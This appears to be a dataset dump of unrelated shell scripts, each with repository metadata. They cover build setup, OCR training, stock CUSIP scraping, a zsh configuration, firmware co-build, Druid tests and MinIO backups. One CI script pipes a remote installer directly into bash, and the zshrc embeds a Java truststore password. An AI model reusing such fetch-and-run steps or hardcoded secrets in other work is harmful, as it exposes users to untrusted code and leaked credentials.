VERSION=${VERSION-1.47.3}
DIR=$(dirname $(readlink -f ${BASH_SOURCE[0]}))
set -e +h
source $DIR/common.sh
wget --content-disposition "http://ftp.gnu.org/gnu/help2man/help2man-$VERSION.tar.xz"
rm -rf help2man-$VERSION && tar -Jxf "help2man-$VERSION.tar.xz"
rm -f "help2man-$VERSION.tar.gz"
cd help2man-$VERSION
./configure --prefix=$PREFIX
make && make install
| true
|
e9ec400eb8412b8afd50ac1fbd1564383422c95c
|
Shell
|
lightbulbone/uefi
|
/uefininja/strings.sh
|
UTF-8
| 146
| 2.796875
| 3
|
[] |
no_license
|
#!/bin/bash
for f in $(find . -iname "$1")
do
strings -a -f $f # C-style strings
strings -a -f -e l $f # 16 bit LE strings
done
| true
|
f5964c63e0284da748d2e3a0fec6624a55724fdc
|
Shell
|
srdg/unarchivingbengali
|
/src/e2ep.sh
|
UTF-8
| 1,404
| 2.75
| 3
|
[] |
no_license
|
echo "*******************Install dependencies***************************"
sudo apt-get install tesseract-ocr bc libtesseract-dev
echo "********************Verify installation**************************"
which tesseract
echo "*******************Install language***************************"
sudo apt-get install tesseract-ocr-ben
echo "*********************Verify language*************************"
ls /usr/share/tesseract-ocr/4.00/tessdata | grep traineddata
echo "**********************Download training data************************"
mkdir -p ./data/ben-ground-truth
wget https://github.com/srdg/unarchived_ben_tess/releases/download/v0.0.2-alpha/data.zip -q --show-progress
unzip -q ./data.zip -d ./data/ben-ground-truth && rm -rf ./data.zip
echo "**********************Download training tools************************"
wget https://github.com/tesseract-ocr/tesstrain/archive/master.zip -q --show-progress && unzip -q ./master.zip # unzip training diretory
rm -rf ./master.zip && sample_data/
echo "***********************Move training data***********************"
mv ./data ./tesstrain-master/
echo "======================= READY TO TRAIN ========================="
cd ./tesstrain-master/
echo "======================= TRAINING MODEL ========================="
make training MODEL_NAME=ben RATIO_TRAIN=0.80
echo "======================= TRAINING DONE! ========================="
| true
|
bfa6bce8d50ddb4b9eb5bd152ebfa8ed2cb88142
|
Shell
|
simhaonline/oftee-sdn-aaa-app
|
/pp.sh
|
UTF-8
| 270
| 2.796875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# useful utility for processing hex strings and packet captures to byte
# array data that can be used in golang.
DATA=$(echo $* | sed -e 's/0x[0-9]*://g' -e 's/ //g' | fold -w2 | tr '\n' ' ')
echo $DATA | sed -e 's/ /, 0x/g' -e 's/^/0x/' | fold -s
| true
|
9999286887208fb85a8e188a245b14ca436833c2
|
Shell
|
aidan-n/moneygo
|
/scripts/gen_cusip_csv.sh
|
UTF-8
| 1,836
| 3.65625
| 4
|
[] |
no_license
|
#!/bin/bash
QUARTER=2017q1
function get_ticker() {
local cusip=$1
local tmpfile=$tmpdir/curl_tmpfile
curl -s -d "sopt=cusip&tickersymbol=${cusip}" http://quantumonline.com/search.cfm > $tmpfile
local quantum_name=$(sed -rn 's@<font size="\+1"><center><b>(.+)</b><br></center></font>\s*$@\1@p' $tmpfile | head -n1)
local quantum_ticker=$(sed -rn 's@^.*Ticker Symbol: ([A-Z\.0-9\-]+) CUSIP.*$@\1@p' $tmpfile | head -n1)
if [[ -z $quantum_ticker ]] || [[ -z $quantum_name ]]; then
curl -s -d "reqforlookup=REQUESTFORLOOKUP&productid=mmnet&isLoggedIn=mmnet&rows=50&for=stock&by=cusip&criteria=${cusip}&submit=Search" http://quotes.fidelity.com/mmnet/SymLookup.phtml > $tmpfile
fidelity_name=$(sed -rn 's@<tr><td height="20" nowrap><font class="smallfont">(.+)</font></td>\s*@\1@p' $tmpfile | sed -r 's/\&/\&/')
fidelity_ticker=$(sed -rn 's@\s+<td align="center" width="20%"><font><a href="/webxpress/get_quote\?QUOTE_TYPE=\&SID_VALUE_ID=(.+)">(.+)</a></td>\s*@\1@p' $tmpfile | head -n1)
if [[ -z $fidelity_ticker ]] || [[ -z $fidelity_name ]]; then
echo $cusip >> $tmpdir/${QUARTER}_bad_cusips.csv
else
echo "$cusip,$fidelity_ticker,$fidelity_name"
fi
else
echo "$cusip,$quantum_ticker,$quantum_name"
fi
}
tmpdir=$(mktemp -d -p $PWD)
# Get the list of CUSIPs from the SEC and generate a nicer format of it
wget -q http://www.sec.gov/divisions/investment/13f/13flist${QUARTER}.pdf -O $tmpdir/13flist${QUARTER}.pdf
pdftotext -layout $tmpdir/13flist${QUARTER}.pdf - > $tmpdir/13flist${QUARTER}.txt
sed -rn 's/^([A-Z0-9]{6}) ([A-Z0-9]{2}) ([A-Z0-9]) .*$/\1\2\3/p' $tmpdir/13flist${QUARTER}.txt > $tmpdir/${QUARTER}_cusips
# Find tickers and names for all the CUSIPs we can and print them out
for cusip in $(cat $tmpdir/${QUARTER}_cusips); do
get_ticker $cusip
done
rm -rf $tmpdir
| true
|
aa1efb6f3e51f0124c2656f5a331a9c82ac5983a
|
Shell
|
bjcerveny/dotfiles
|
/.zshrc
|
UTF-8
| 5,288
| 2.703125
| 3
|
[] |
no_license
|
# Enable Powerlevel10k instant prompt. Should stay close to the top of ~/.zshrc.
# Initialization code that may require console input (password prompts, [y/n]
# confirmations, etc.) must go above this block; everything else may go below.
if [[ -r "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh" ]]; then
source "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh"
fi
# Path to your oh-my-zsh configuration.
source $HOME/.zshrc.site.pre
SHELL=/bin/zsh
ZSH=$HOME/.oh-my-zsh
DOTFILES=$HOME/git/dotfiles
TIMEFMT="'$fg[green]%J$reset_color' real: $fg[yellow]%*Es$reset_color, user: $fg[yellow]%U$reset_color, sys: $fg[yellow]%S$reset_color, cpu: $fg[yellow]%P$reset_color"
# Set name of the theme to load.
# Look in ~/.oh-my-zsh/themes/
# Optionally, if you set this to "random", it'll load a random theme each
# time that oh-my-zsh is loaded.
ZSH_THEME=powerlevel10k/powerlevel10k
# Uncomment the following line to use case-sensitive completion.
# CASE_SENSITIVE="true"
# Uncomment the following line to disable bi-weekly auto-update checks.
# DISABLE_AUTO_UPDATE="true"
# Uncomment the following line to change how often to auto-update (in days).
# export UPDATE_ZSH_DAYS=13
# Uncomment the following line to disable colors in ls.
# DISABLE_LS_COLORS="true"
# Uncomment the following line to disable auto-setting terminal title.
# DISABLE_AUTO_TITLE="true"
# Uncomment the following line to enable command auto-correction.
# ENABLE_CORRECTION="true"
# Uncomment the following line to display red dots whilst waiting for completion.
# COMPLETION_WAITING_DOTS="true"
# Uncomment the following line if you want to disable marking untracked files
# under VCS as dirty. This makes repository status check for large repositories
# much, much faster.
DISABLE_UNTRACKED_FILES_DIRTY="true"
# Uncomment the following line if you want to change the command execution time
# stamp shown in the history command output.
# The optional three formats: "mm/dd/yyyy"|"dd.mm.yyyy"|"yyyy-mm-dd"
# HIST_STAMPS="mm/dd/yyyy"
# Would you like to use another custom folder than $ZSH/custom?
ZSH_CUSTOM=$DOTFILES/oh-my-zsh-custom
# Which plugins would you like to load? (plugins can be found in ~/.oh-my-zsh/plugins/*)
# Custom plugins may be added to ~/.oh-my-zsh/custom/plugins/
# Example format: plugins=(rails git textmate ruby lighthouse)
# Add wisely, as too many plugins slow down shell startup.
plugins=(aws git svn osx docker gradle brew repo history-substring-search)
source $ZSH/oh-my-zsh.sh
# User configuration
source $DOTFILES/brians-dotfiles.sh
# Customize to your needs...
export PATH=~/bin:/opt/swdev/bin:$HOME/bin:/usr/local/bin:$PATH:./
# export MANPATH="/usr/local/man:$MANPATH"
# You may need to manually set your language environment
# export LANG=en_US.UTF-8
# Preferred editor for local and remote sessions
# if [[ -n $SSH_CONNECTION ]]; then
# export EDITOR='vim'
# else
# export EDITOR='mvim'
# fi
# Set personal aliases, overriding those provided by oh-my-zsh libs,
# plugins, and themes. Aliases can be placed here, though oh-my-zsh
# users are encouraged to define aliases within the ZSH_CUSTOM folder.
# For a full list of active aliases, run `alias`.
#
source ~/.aliases.zsh
# Turn off annoying spell correction
setopt nocorrectall
if [[ `uname -s` == "Darwin" ]]; then
export GROOVY_HOME=/usr/local/opt/groovy/libexec
export JAVA_HOME=`/usr/libexec/java_home`
# for Bee
#export JAVA_OPTS="$JAVA_OPTS -Djavax.net.ssl.trustStore=/Library/Java/Home/lib/security/cacerts -Djavax.net.ssl.trustStorePassword=java-0kEys"
export JAVA_OPTS="$JAVA_OPTS -Djavax.net.ssl.trustStore=$JAVA_HOME/lib/security/cacerts -Djavax.net.ssl.trustStorePassword=java-0kEys"
export GRADLE_HOME=/usr/local/opt/gradle/libexec
fi
LD_LIBRARY_PATH=$HOME/lib:$LD_LIBRARY_PATH
cdpath=(~ ~/Work /local/$USER)
# Set site-specific items.
source ~/.zshrc.site
compinit -i
export LESS=-r
export PAGER=less
# added by Anaconda3 2019.03 installer
# >>> conda init >>>
# !! Contents within this block are managed by 'conda init' !!
__conda_setup="$(CONDA_REPORT_ERRORS=false '$HOME/anaconda3/bin/conda' shell.bash hook 2> /dev/null)"
if [ $? -eq 0 ]; then
\eval "$__conda_setup"
else
if [ -f "/Users/bcerveny/anaconda3/etc/profile.d/conda.sh" ]; then
# . "/Users/bcerveny/anaconda3/etc/profile.d/conda.sh" # commented out by conda initialize
CONDA_CHANGEPS1=false conda activate base
else
\export PATH="/Users/bcerveny/anaconda3/bin:$PATH"
fi
fi
unset __conda_setup
# <<< conda init <<<
# To customize prompt, run `p10k configure` or edit ~/.p10k.zsh.
[[ -f ~/.p10k.zsh ]] && source ~/.p10k.zsh
# >>> conda initialize >>>
# !! Contents within this block are managed by 'conda init' !!
__conda_setup="$('/usr/local/Caskroom/miniconda/base/bin/conda' 'shell.zsh' 'hook' 2> /dev/null)"
if [ $? -eq 0 ]; then
eval "$__conda_setup"
else
if [ -f "/usr/local/Caskroom/miniconda/base/etc/profile.d/conda.sh" ]; then
. "/usr/local/Caskroom/miniconda/base/etc/profile.d/conda.sh"
else
fi
fi
unset __conda_setup
# <<< conda initialize <<<
export PATH="/usr/local/opt/ruby/bin:/usr/local/opt/python@3.8/bin:$PATH"
TIMEFMT="%J %U user %S system %P cpu %*E total"
eval "$(direnv hook zsh)"
| true
|
cd14b768bd55e7b0024e758b4ac2e6d19790d2ab
|
Shell
|
yassun/crypto-qrcode-generator
|
/script/ci-install-web.sh
|
UTF-8
| 273
| 2.703125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
set -eu
set -o pipefail
# Install Yarn (https://yarnpkg.com/en/docs/install-ci#travis-tab)
curl -o- -L https://yarnpkg.com/install.sh | bash
export PATH="$HOME/.yarn/bin:$PATH"
# Install package json
cd $WEB_SRC_DIR
yarn install
cd $TRAVIS_BUILD_DIR
| true
|
73ac39c4420afc48bac19623c2fe313062fc68a1
|
Shell
|
atlury/aryalinux
|
/applications/gst-plugins-bad.sh
|
UTF-8
| 1,336
| 2.921875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -e
. /etc/alps/alps.conf
NAME="gst-plugins-bad"
VERSION="0.10.23"
. /var/lib/alps/functions
#REQ:gst-plugins-base
#REC:faac
#REC:libpng
#REC:libvpx
#REC:openssl10
#REC:xvid
#OPT:curl
#OPT:faad2
#OPT:jasper
#OPT:libass
#OPT:libmusicbrainz
#OPT:librsvg
#OPT:libsndfile
#OPT:libvdpau
#OPT:neon
#OPT:sdl
#OPT:soundtouch
cd $SOURCE_DIR
URL=http://gstreamer.freedesktop.org/src/gst-plugins-bad/gst-plugins-bad-0.10.23.tar.xz
wget -nc http://gstreamer.freedesktop.org/src/gst-plugins-bad/gst-plugins-bad-0.10.23.tar.xz
TARBALL=`echo $URL | rev | cut -d/ -f1 | rev`
DIRECTORY=`tar tf $TARBALL | cut -d/ -f1 | uniq`
tar xf $TARBALL
cd $DIRECTORY
sed -e '/Some compatibility/ s:*/::' \
-e '/const char/ i*/' \
-i ext/vp8/gstvp8utils.h
./configure --prefix=/usr \
--with-gtk=3.0 \
--disable-examples \
--disable-static \
--with-package-name="GStreamer Bad Plugins 0.10.23 BLFS" \
--with-package-origin="http://www.linuxfromscratch.org/blfs/view/systemd/" &&
make "-j`nproc`"
sudo tee rootscript.sh << "ENDOFROOTSCRIPT"
make install
ENDOFROOTSCRIPT
sudo chmod 755 rootscript.sh
sudo ./rootscript.sh
sudo rm rootscript.sh
cd $SOURCE_DIR
cleanup "$NAME" "$DIRECTORY"
register_installed "$NAME" "$VERSION" "$INSTALLED_LIST"
| true
|
7b576d88aff8355bcaa2b8931e9e80eccdc3b7f3
|
Shell
|
liuleiliujing/FreemodusTCP-On-Wifi-CHIP
|
/SDK_V4.8.0/tools/scripts/build/co_build_script/build.sh
|
UTF-8
| 11,972
| 3.46875
| 3
|
[] |
no_license
|
#!/bin/bash
# This script will start the compilation of cm4/dsp according to the configuration file (mapping_proj.cfg).
# Build cm4 would bring bl option by default.
###############################################################################
# Variables
OUT="$PWD/out"
working_dir="$PWD"
feature_mk=""
source mcu/tools/scripts/build/co_build_script/mapping_proj.cfg
###############################################################################
# Functions
show_usage () {
echo "==============================================================="
echo "Build Project"
echo "==============================================================="
echo "Usage: $0 <board> <project> [clean]"
echo ""
echo "Example:"
echo " $0 ab1558_evk no_rtos_initialize_system"
echo " $0 clean (clean folder: out)"
echo " $0 ab1558_evk clean (clean folder: out/ab1558_evk)"
echo " $0 ab1558_evk no_rtos_initialize_system clean (clean folder: out/ab1558_evk/no_rtos_initialize_system)"
echo ""
echo "==============================================================="
echo "List Available Example Projects"
echo "==============================================================="
echo "Usage: $0 list"
echo ""
}
show_available_proj () {
echo "==============================================================="
echo "Available Build Projects:"
echo "==============================================================="
for var in ${!map_@}
do
board=$(echo $var | sed 's/__/:/g' | cut -d':' -f2)
project=$(echo $var | sed 's/__/:/g' | cut -d':' -f3)
echo "$board"
echo " $project"
eval proj_map_key=( \${!$var[@]} )
eval proj_map_value=( \${$var[@]} )
for key in ${proj_map_key[@]}
do
eval echo \"\ \ \ \ \ \ $key: \${$var[\"$key\"]}\"
done
done
}
clean_out () {
rm -rf $1
echo "rm -rf $1"
}
# copy cm4 files
copy_cm4_files () {
debug_dir=out/$1/$3/debug
download_dir=out/$1/$3/download
if [ ! -e "$debug_dir" ]; then
mkdir -p "$debug_dir"
fi
if [ ! -e "$download_dir" ]; then
mkdir -p "$download_dir"
fi
# copy debug files if exist
echo "cp -f mcu/out/$1/$2/$2.elf $debug_dir"
echo "cp -f mcu/out/$1/$2/$2.dis $debug_dir"
echo "cp -f mcu/out/$1/$2/$2.map $debug_dir"
echo "cp -f mcu/out/$1/$2/cm4_log_str.bin $debug_dir"
test -e mcu/out/$1/$2/$2.elf && cp -f mcu/out/$1/$2/$2.elf $debug_dir
test -e mcu/out/$1/$2/$2.dis && cp -f mcu/out/$1/$2/$2.dis $debug_dir
test -e mcu/out/$1/$2/$2.map && cp -f mcu/out/$1/$2/$2.map $debug_dir
test -e mcu/out/$1/$2/cm4_log_str.bin && cp -f mcu/out/$1/$2/cm4_log_str.bin $debug_dir
# copy download files if exist
echo "cp -f mcu/out/$1/$2/flash_download.cfg $download_dir"
echo "cp -f mcu/out/$1/$2/*_bootloader.bin $download_dir"
echo "cp -f mcu/out/$1/$2/$2.bin $download_dir"
echo "cp -f mcu/out/$1/$2/partition_table.bin $download_dir"
echo "cp -f mcu/out/$1/$2/ab155x_patch_hdr.bin $download_dir"
test -e mcu/out/$1/$2/flash_download.cfg && cp -f mcu/out/$1/$2/flash_download.cfg $download_dir
test -e mcu/out/$1/$2/*_bootloader.bin && cp -f mcu/out/$1/$2/*_bootloader.bin $download_dir
test -e mcu/out/$1/$2/$2.bin && cp -f mcu/out/$1/$2/$2.bin $download_dir
test -e mcu/out/$1/$2/partition_table.bin && cp -f mcu/out/$1/$2/partition_table.bin $download_dir
test -e mcu/out/$1/$2/ab155x_patch_hdr.bin && cp -f mcu/out/$1/$2/ab155x_patch_hdr.bin $download_dir
}
# copy dsp files
copy_dsp_files () {
debug_dir=out/$1/$3/debug
download_dir=out/$1/$3/download
if [ ! -e "$debug_dir" ]; then
mkdir -p $debug_dir
fi
if [ ! -e "$download_dir" ]; then
mkdir -p "$download_dir"
fi
# copy debug files if exist
echo "cp -f dsp/out/$1/$2/$2.out $debug_dir"
echo "cp -f dsp/out/$1/$2/$2.asm $debug_dir"
echo "cp -f dsp/out/$1/$2/$2.map $debug_dir"
echo "cp -f dsp/out/$1/$2/dsp*_log_str.bin $debug_dir"
test -e dsp/out/$1/$2/$2.out && cp -f dsp/out/$1/$2/$2.out $debug_dir
test -e dsp/out/$1/$2/$2.asm && cp -f dsp/out/$1/$2/$2.asm $debug_dir
test -e dsp/out/$1/$2/$2.map && cp -f dsp/out/$1/$2/$2.map $debug_dir
test -e dsp/out/$1/$2/dsp*_log_str.bin && cp -f dsp/out/$1/$2/dsp*_log_str.bin $debug_dir
# copy download files if exist
echo "cp -f dsp/out/$1/$2/$2.bin $download_dir"
test -e dsp/out/$1/$2/$2.bin && cp -f dsp/out/$1/$2/$2.bin $download_dir
}
###############################################################################
# Parsing arguments
if [ "$#" -eq "0" ]; then
show_usage
exit 1
fi
declare -a argv=($0)
for i in $@
do
case $i in
list)
show_available_proj
exit 0
;;
-f=*|--feature=*)
feature_mk="${i#*=}"
;;
-*)
echo "Error: unknown parameter \"$i\""
show_usage
exit 1
;;
*)
argv+=($i)
;;
esac
done
# check configurations
board=${argv[1]}
project=${argv[2]}
output_dir=$OUT/$board/$project
mapping_var="map__${board}__${project}"
eval dsp1_proj=\${$mapping_var["dsp1"]}
eval dsp0_proj=\${$mapping_var["dsp0"]}
eval cm4_proj=\${$mapping_var["cm4"]}
# To do actions according to arguments
if [ "${argv[3]}" == "clean" ]; then
if [ "${#argv[@]}" != "4" ]; then
show_usage
exit 1
fi
if [ ! -z "$dsp1_proj" ]; then
clean_out $working_dir/dsp/out/$board/$dsp1_proj
fi
if [ ! -z "$dsp0_proj" ]; then
clean_out $working_dir/dsp/out/$board/$dsp0_proj
fi
if [ ! -z "$cm4_proj" ]; then
clean_out $working_dir/mcu/out/$board/$cm4_proj
fi
clean_out $OUT/$board/$project
elif [ "${argv[2]}" == "clean" ]; then
if [ "${#argv[@]}" != "3" ]; then
show_usage
exit 1
fi
clean_out $working_dir/dsp/out/$board
clean_out $working_dir/mcu/out/$board
clean_out $OUT/$board
elif [ "${argv[1]}" == "clean" ]; then
if [ "${#argv[@]}" != "2" ]; then
show_usage
exit 1
fi
clean_out $working_dir/mcu/out
clean_out $working_dir/dsp/out
clean_out $OUT
else
if [ "${#argv[@]}" != "3" ]; then
show_usage
exit 1
fi
eval mapping_var_key=\${!$mapping_var[@]}
if [ -z "$mapping_var_key" ]; then
show_usage
echo "Error: cannot find board=$board project=$project configurations in mapping_proj.cfg."
exit 1
fi
rm -rf $output_dir/log
mkdir -p $output_dir/log
rm -rf $output_dir/debug
mkdir -p $output_dir/debug
rm -rf $output_dir/download
mkdir -p $output_dir/download
echo "$0 $@" > $output_dir/log/build_time.log
echo "Start CO-Build: "`date` >> $output_dir/log/build_time.log
# dsp1 build start
if [ ! -z "$dsp1_proj" ]; then
echo "cd $working_dir/dsp"
cd $working_dir/dsp
echo "=============================================================="
echo "Start DSP1 Build"
echo "=============================================================="
#echo "Start DSP1 Build: "`date` >> $output_dir/log/build_time.log
./build.sh $board $dsp1_proj
DSP1_BUILD_RESULT=$?
#echo "End DSP1 Build: "`date` >> $output_dir/log/build_time.log
echo "=============================================================="
echo "End DSP1 Build"
echo "=============================================================="
# change back to working dir
echo "cd $working_dir/"
cd $working_dir/
# copy dsp files
copy_dsp_files $board $dsp1_proj $project
fi
# dsp0 build start
if [ ! -z "$dsp0_proj" ]; then
echo "cd $working_dir/dsp"
cd $working_dir/dsp
echo "=============================================================="
echo "Start DSP0 Build"
echo "=============================================================="
#echo "Start DSP0 Build: "`date` >> $output_dir/log/build_time.log
./build.sh $board $dsp0_proj
DSP0_BUILD_RESULT=$?
#echo "End DSP0 Build: "`date` >> $output_dir/log/build_time.log
echo "=============================================================="
echo "End DSP0 Build"
echo "=============================================================="
# change back to working dir
echo "cd $working_dir/"
cd $working_dir/
# copy dsp files
copy_dsp_files $board $dsp0_proj $project
fi
# cm4 build start
if [ ! -z "$cm4_proj" ]; then
echo "cd $working_dir/mcu"
cd $working_dir/mcu
echo "=============================================================="
echo "Start CM4 Build"
echo "=============================================================="
#echo "Start CM4 Build: "`date` >> $output_dir/log/build_time.log
if [ ! -z "$feature_mk" ]; then
./build.sh $board $cm4_proj -f=$feature_mk bl
else
./build.sh $board $cm4_proj bl
fi
CM4_BUILD_RESULT=$?
#echo "End CM4 Build: "`date` >> $output_dir/log/build_time.log
echo "=============================================================="
echo "End CM4 Build"
echo "=============================================================="
# change back to working dir
echo "cd $working_dir/"
cd $working_dir/
# copy cm4 files
copy_cm4_files $board $cm4_proj $project
fi
# update flash_download.cfg
flash_cfg=$output_dir/download/flash_download.cfg
if [ -e "$flash_cfg" ]; then
if [ ! -z "$dsp0_proj" ]; then
sed -i "s|\bdsp0_freertos_create_thread.bin|${dsp0_proj}.bin|g" $flash_cfg
sed -i -n '{/rom:/{x;n;{/dsp0/{x;s|^#||;p;x;tc};x;p;be}};{:c;/\bdsp0_/,+2s|^#||;}};p;bend;:e;x;p;:end' $flash_cfg
fi
if [ ! -z "$dsp1_proj" ]; then
sed -i "s|\bdsp1_no_rtos_initialize_system.bin|${dsp1_proj}.bin|g" $flash_cfg
sed -i -n '{/rom:/{x;n;{/dsp1/{x;s|^#||;p;x;tc};x;p;be}};{:c;/\bdsp1_/,+2s|^#||;}};p;bend;:e;x;p;:end' $flash_cfg
fi
fi
# return code
declare -i BUILD_RESULT=0
echo "End CO-Build: "`date` >> $output_dir/log/build_time.log
if [ ! -z "$DSP1_BUILD_RESULT" ]; then
if [ "$DSP1_BUILD_RESULT" -eq "0" ]; then
echo "DSP1 BUILD: PASS" >> $output_dir/log/build_time.log
else
echo "DSP1 BUILD: FAIL" >> $output_dir/log/build_time.log
BUILD_RESULT+=1
fi
fi
if [ ! -z "$DSP0_BUILD_RESULT" ]; then
if [ "$DSP0_BUILD_RESULT" -eq "0" ]; then
echo "DSP0 BUILD: PASS" >> $output_dir/log/build_time.log
else
echo "DSP0 BUILD: FAIL" >> $output_dir/log/build_time.log
BUILD_RESULT+=1
fi
fi
if [ ! -z "$CM4_BUILD_RESULT" ]; then
if [ "$CM4_BUILD_RESULT" -eq "0" ]; then
echo "CM4 BUILD: PASS" >> $output_dir/log/build_time.log
else
echo "CM4 BUILD: FAIL" >> $output_dir/log/build_time.log
BUILD_RESULT+=1
fi
fi
if [ "$BUILD_RESULT" -eq "0" ]; then
echo "TOTAL CO-BUILD: PASS (return code $BUILD_RESULT)" >> $output_dir/log/build_time.log
else
echo "TOTAL CO-BUILD: FAIL (return code $BUILD_RESULT)" >> $output_dir/log/build_time.log
fi
echo "=============================================================="
echo "Summary CO-BUILD"
echo "=============================================================="
cat $output_dir/log/build_time.log
mv -f $output_dir/*.log $output_dir/log/ 2> /dev/null
exit $BUILD_RESULT
fi
| true
|
af1ba8c2cf9c0661524112a275a1ac22116b6b04
|
Shell
|
parampavar/cube.js
|
/.github/actions/integration/druid.sh
|
UTF-8
| 505
| 2.5625
| 3
|
[
"MIT",
"Apache-2.0",
"Cube"
] |
permissive
|
#!/bin/bash
set -eo pipefail
# Debug log for test containers
export DEBUG=testcontainers
export TEST_POSTGRES_VERSION=13
export TEST_ZOOKEEPER_VERSION=3.5
export TEST_DRUID_VERSION=0.19.0
echo "::group::Druid ${TEST_DRUID_VERSION}";
docker pull postgres:${TEST_POSTGRES_VERSION}
docker pull zookeeper:${TEST_ZOOKEEPER_VERSION}
docker pull apache/druid:${TEST_DRUID_VERSION}
echo "Druid ${TEST_DRUID_VERSION}";
yarn lerna run --concurrency 1 --stream --no-prefix integration:druid
echo "::endgroup::"
| true
|
2b910debe8ef60af3c90437f62ecede717a6fdb5
|
Shell
|
h0l0gram/bash-tools
|
/git-prompt.sh
|
UTF-8
| 3,949
| 3.875
| 4
|
[] |
no_license
|
#!/bin/bash
#
#Git prompt
#Author: Jan Hänsli
#Makes you a nice git prompt when in a git repository
#
#call "ginfo" for symbol explanation
#
R="\033[0;37m"
TITLE_COLOR="\033[0;36m"
SYMBOL_SPACE=
AHEAD_SYMBOL=↑${SYMBOL_SPACE}
AHEAD_COLOR="\033[0;32m"
BEHIND_SYMBOL=↓${SYMBOL_SPACE}
BEHIND_COLOR="\033[0;31m"
UPTODATE_SYMBOL=✔${SYMBOL_SPACE}
UPTODATE_COLOR="\033[0;32m"
UNTRACKED_SYMBOL=★${SYMBOL_SPACE}
UNTRACKED_COLOR="\033[0;33m"
STAGED_SYMBOL=⚑${SYMBOL_SPACE}
STAGED_COLOR="\033[01;33m"
DIRTY_SYMBOL=∴${SYMBOL_SPACE}
DIRTY_COLOR="\033[0;35m"
BRANCH_COLOR="\033[1;37m"
BRANCH_SYMBOL="\033[0;36m"→${SYMBOL_SPACE}$R
UPSTREAM_COLOR="\033[1;37m"
STASHED_SYMBOL="⚒${SYMBOL_SPACE}"
STASHED_COLOR="\033[0;36m"
TAG_COLOR="\033[37;48;5;17m"
function ginfo(){
printf "\n${TITLE_COLOR}Git Prompt v1.2.0$R
Author: Jan Haensli
https://github.com/h0l0gram/bash-tools
Symbols:
${AHEAD_COLOR}${AHEAD_SYMBOL} : commits ahead
${BEHIND_COLOR}${BEHIND_SYMBOL} : commits behind
${UPTODATE_COLOR}${UPTODATE_SYMBOL} : up to date
${STAGED_COLOR}${STAGED_SYMBOL} : staged files
${DIRTY_COLOR}${DIRTY_SYMBOL} : modified files (unstaged)
${UNTRACKED_COLOR}${UNTRACKED_SYMBOL} : untracked files
${STASHED_COLOR}${STASHED_SYMBOL} : stashed entries
${TAG_COLOR}1.0$R : tags
"
}
function parse_git_status() {
DIVERGE_PATTERN="Your branch and '(.*)' have diverged,"
DIVERGE_PATTERN2="and have ([0-9]+) and ([0-9]+)"
BRANCH_PATTERN="^On branch ([^${IFS}]*)"
DIRTY_PATTERN=`git diff --numstat | wc -l | tr -d '[:space:]'`
STAGED_PATTERN=`git diff --cached --numstat | wc -l | tr -d '[:space:]'`
AHEAD_PATTERN="ahead of '(.*)'.* ([0-9]+) commit"
BEHIND_PATTERN="behind '(.*)'.* ([0-9]+) commit"
UNTRACKED_PATTERN=`git status -u -s | grep ^?? | wc -l | tr -d '[:space:]'`
UPTODATE_PATTERN="up(-| )to(-| )date with '(.*)'"
git_dirty="$(git diff --numstat | wc -l | tr -d '[:space:]')"
git_staged="$(git diff --cached --numstat | wc -l | tr -d '[:space:]')"
git_status="$(git status 2> /dev/null)"
stash="$(git stash list | wc -l | tr -d '[:space:]')"
git_tags="$(for tag in `git tag --points-at HEAD`; do echo -e -n "$TAG_COLOR$tag$R "; done)"
if [[ ${git_status} =~ ${BRANCH_PATTERN} ]]; then
branch=${BRANCH_COLOR}${BASH_REMATCH[1]}
fi
if [[ ${git_status} =~ ${AHEAD_PATTERN} ]]; then
upstream=${BASH_REMATCH[1]}
ahead= ${AHEAD_COLOR}${AHEAD_SYMBOL}${BASH_REMATCH[2]}
fi
if [[ ${git_status} =~ ${BEHIND_PATTERN} ]]; then
upstream=${BASH_REMATCH[1]}
behind= ${BEHIND_COLOR}${BEHIND_SYMBOL}${BASH_REMATCH[2]}
fi
if [[ ${git_status} =~ ${DIVERGE_PATTERN} ]]; then
upstream=${BASH_REMATCH[1]}
if [[ ${git_status} =~ ${DIVERGE_PATTERN2} ]]; then
ahead=" ${AHEAD_COLOR}${AHEAD_SYMBOL}${BASH_REMATCH[1]}"
behind=" ${BEHIND_COLOR}${BEHIND_SYMBOL}${BASH_REMATCH[2]}"
fi
fi
if [[ ${git_status} =~ ${UPTODATE_PATTERN} ]]; then
upstream=${BASH_REMATCH[3]}
uptodate="${UPTODATE_COLOR}${UPTODATE_SYMBOL} "
fi
if [[ $DIRTY_PATTERN -gt 0 ]]; then
dirty= ${DIRTY_COLOR}${DIRTY_SYMBOL}$DIRTY_PATTERN
fi
if [[ $STAGED_PATTERN -gt 0 ]]; then
staged= ${STAGED_COLOR}${STAGED_SYMBOL}$STAGED_PATTERN
fi
if [[ $UNTRACKED_PATTERN -gt 0 ]]; then
untracked= ${UNTRACKED_COLOR}${UNTRACKED_SYMBOL}$UNTRACKED_PATTERN
fi
if [[ $stash -gt 0 ]]; then
stash_count=" ${STASHED_COLOR}${STASHED_SYMBOL}$stash"
fi
echo -e "${BRANCH_COLOR}($branch)${BRANCH_SYMBOL}${UPSTREAM_COLOR}($upstream)$ahead$behind$uptodate$staged$dirty$untracked$stash_count $git_tags"
}
function git_prompt() {
worktree=`git rev-parse --is-inside-work-tree 2>&1`
if [ $? -ne 0 ]; then
return;
fi
if [[ "false" == "$worktree" ]]; then
return;
fi
gitPrompt="$(parse_git_status)"
printf "%s$R\n" "${gitPrompt}"
}
git_prompt
| true
|
6b961117e2054731be2ed0bf5affa89b479f22e5
|
Shell
|
xianlimei/k8s-apps
|
/dockerfiles/backuper/entrypoint.sh
|
UTF-8
| 371
| 2.90625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh -xe
if [ -z "${BACKUP_TARGET}" ]; then
exit 1
fi
FILENAME=backup-${BACKUP_TARGET}-$(date +%Y%m%d%H%M%S).tar.gz
tar -zcvf /tmp/${FILENAME} /target
mc config host add minio http://192.168.1.56:9000 ${MINIO_ACCESS_KEY} ${MINIO_SECRET_KEY}
mc cp /tmp/${FILENAME} minio/backups/${BACKUP_TARGET}/${FILENAME}
mc rm -r --older-than 6 --force minio/backups/ghost/
| true
|
801d481012e057921bd0e5a6671e2bbdec4e5ed0
|
Shell
|
naingyeminn/vFix
|
